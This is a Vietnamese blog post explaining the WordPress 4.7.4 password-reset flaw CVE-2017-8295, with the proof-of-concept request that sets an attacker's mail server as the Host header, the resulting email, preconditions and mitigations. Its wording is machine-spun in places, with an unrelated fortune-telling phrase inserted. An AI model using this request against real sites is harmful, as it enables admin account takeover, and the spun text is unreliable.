WordPress phiên bản 4.7.4 được phát hiện một lỗi 0-day (CVE-2017-8295)

WordPress phiên bản 4.7.4 được phát hiện một lỗi 0-day (CVE-2017-8295)

Đánh giá bài viết này

hôm nay có thể bạn đã từng nghe qua thông tin của mọi người rằng WordPress phiên bản 4.7.4 được phát hiện một lỗi 0-day (CVE-2017-8295) giúp tin tặc có thể lấy mật khẩu của người quản trị cao đặc biệt là admin phê duyệt việc reset mật khẩu không cần cấp quyền vào email của chủ sỡ hữu.

Theo làm web chuẩn seo lỗi này bạn có thể tham khảo diễn giải coi bói vận mệnh 2017 tại https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html.

ngoài ra trong bài viết này mình sẽ giảng giải thêm và chúng ta có thể biết rằng bạn có nguy cơ bị khai phá hay không, từ đó mới áp dụng cách cài plugin chặn reset mật khẩu.

Kịch bản tấn công

Theo ExplotItBox, đầu tiên tin tặc sẽ gửi một truy tìm HTTP tới website ưng chuẩn địa chỉ IP, tức thị website của bạn phải truy hỏi cập được thông qua IP. Nếu bạn nào dùng Shared Hosting sử dụng cPanel bản mới nhất thì không cần lo lắng nữa vì trước đây lâu lắm rồi họ đã có một bản vá về lỗi 0-day trên Linux, và với Shared Hosting bạn cũng chẳng thể truy tìm cập vào website thông qua IP.

-----[ HTTP Request ]----

POST /wp/wordpress/wp-login.php?action=lostpassword HTTP/1.1
Host: injected-attackers-mxserver.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 56
user_login=admin&redirect_to=&wp-submit=Get+New+Password

Ở đoạn trên, tin tặc sẽ ghim địa chỉ máy chủ email của họ vào, và trên Apache thì SERVER_NAME sẽ tự động thay thế bằng giá trị HOST trong truy hỏi trên, tức thị địa chỉ máy chủ email của tin tặc.

Khi đó, người quản trị sẽ nhận 1 email như sau:

Subject: [CompanyX WP] Password Reset
Return-Path: 
From: WordPress 
Message-ID: 
X-Priority: 3
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Someone requested that the password be reset for the following account:

http://companyX-wp/wp/wordpress/

Username: admin

If this was a mistake, just ignore this email and nothing will happen.

To reset your password, visit the following address:

Bạn sẽ thấy phần Return-Path sẽ chứa giá trị mà WordPress tự điền vào giá trị SERVER_NAME, tức là wordpress@địa-chỉ-máy-chủ-email-tin-tặc.ltd và kể cả Message-ID cũng chứa một địa chỉ của tin tặc.

Như vậy là đã rõ, nếu hệ thống hoặc người dùng vô tình phản hồi email này, thì tin tặc sẽ nhận chính các nội dung email chứa khóa khôi phục mật khẩu quản trị. Như vậy ta sẽ có 3 trường hợp như sau:

  1. Một số email của người quản trị có tính năng tự động giải đáp email kèm nội dung email được trả lời.
  2. Tin tặc sẽ gửi một lượng lớn email khiến máy chủ của người dùng bị ngập lụt dung lượng sử dụng hay đại loại vậy khiến email chẳng thể gửi đi và phản hồi ngược lại.
  3. Nếu người dùng quản trị dùng email của Gmail hay các nhà cung cấp mail khác, tin tặc sẽ phải gửi một lượng lớn truy hỏi như trên để nhà cung cấp chặn địa chỉ máy chủ tin tặc, từ đó email không thể gửi đi và phản hồi trái lại.

Vậy điều này có nguy hiểm với bạn không?

Suy xét ra thì lỗi này sẽ nghiêm trọng và bạn có thể bị liên hệ nếu:

  • Bạn đang dùng webserver Apache và có thể tầm nã cập vào website phê chuẩn IP. tức là không tạo virtualhost ấy.
  • Tin tặc phải biết được tên đăng nhập của người quản trị.
  • Tập tin wp-login.php phải được tróc nã cập trực tiếp. Một số plugin ẩn đường dẫn đăng nhập như iThemes Security sẽ tự động chặn tróc nã cập trực tiếp qua tập tin này. Ví dụ: https://thachpham.com/wp-login.php.
  • Người quản trị phải dùng email tự host thì sẽ hoạ chăng có nguy cơ, còn Gmail hay gì đó thì phải gửi một lượng email cực lớn cùng lúc họ mới chặn một máy chủ gửi đi.

Như vậy nếu bạn thỏa mãn các điều kiện trên thì có thể phòng chống bằng cách cài plugin Disable Password Reset để chặn chức năng quên mật khẩu đi. Còn nếu không thì lỗi này cũng không thật sự quá nguy hiểm như chúng ta hình dung. ngoài ra trong ngày mai, WordPress sẽ ra một bản vá để chúng ta yên tâm hơn.

Related posts